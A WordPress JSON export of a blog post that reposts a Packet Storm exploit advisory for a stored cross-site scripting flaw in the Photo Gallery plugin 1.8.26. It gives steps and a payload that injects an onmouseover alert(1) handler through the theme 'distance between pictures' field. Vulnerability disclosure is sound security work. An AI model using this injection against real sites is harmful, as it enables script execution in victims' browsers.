{"id":57899,"date":"2024-07-04T20:39:55","date_gmt":"2024-07-04T17:39:55","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179357\/wpphotogallery1826-xss.txt"},"modified":"2024-07-04T20:39:55","modified_gmt":"2024-07-04T17:39:55","slug":"wordpress-photo-gallery-1-8-26-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/wordpress-photo-gallery-1-8-26-cross-site-scripting\/","title":{"rendered":"WordPress Photo Gallery 1.8.26 Cross Site Scripting"},"content":{"rendered":"
\n
WordPress Photo Gallery 1.8.26 Cross Site Scripting<\/strong><\/a><\/dt>\n
Posted Jul 4, 2024<\/a><\/dd>\n
Authored by tmrswrr<\/a><\/dd>\n
\n

WordPress Photo Gallery plugin version 1.8.26 suffers from a persistent cross site scripting vulnerability.<\/p>\n<\/dd>\n

tags<\/span> | exploit<\/a>, xss<\/a><\/dd>\n
SHA-256<\/span> | 620cac705498df4446e350abd9066b0001ddae26019194a472b3a79d8cbd69cd<\/code><\/dd>\n
Download<\/a> | Favorite<\/a> | View<\/a><\/dd>\n<\/dl>\n
\n
# Exploit Title: Wordpress Photo Gallery Version 1.8.26 Stored XSS
# Date: 2024-07-03
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https:\/\/10web.io\/plugins\/wordpress-photo-gallery\/
# Version 1.8.26
### Steps to Execute the Payload:<\/p>
1. Click Photo Gallery > Themes > Edit Themes > https:\/\/127.0.0.1\/wp-admin\/admin.php?page=themes_bwg&task=edit&current_id=2 
2. Write Distance between pictures place your payload**: `\"onmouseover=\"alert(1)\"style=\"position:absolute;width:100%;height:100%;top:0;left:0;\"qq9r3`
3. Click Update
4. You will see the payload executed <\/p><\/code><\/pre>\n<\/div>\n","protected":false},"excerpt":{"rendered":"
WordPress Photo Gallery 1.8.26 Cross Site Scripting Posted Jul 4, 2024 Authored by tmrswrr WordPress Photo Gallery plugin version 1.8.26 suffers from a persistent cross site scripting vulnerability. tags | exploit, xss SHA-256 | 620cac705498df4446e350abd9066b0001ddae26019194a472b3a79d8cbd69cd Download | Favorite | View # Exploit Title: Wordpress Photo Gallery Version 1.8.26 Stored XSS# Date: 2024-07-03# Exploit Author: tmrswrr# …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-57899","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57899","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=57899"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57899\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=57899"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=57899"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=57899"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}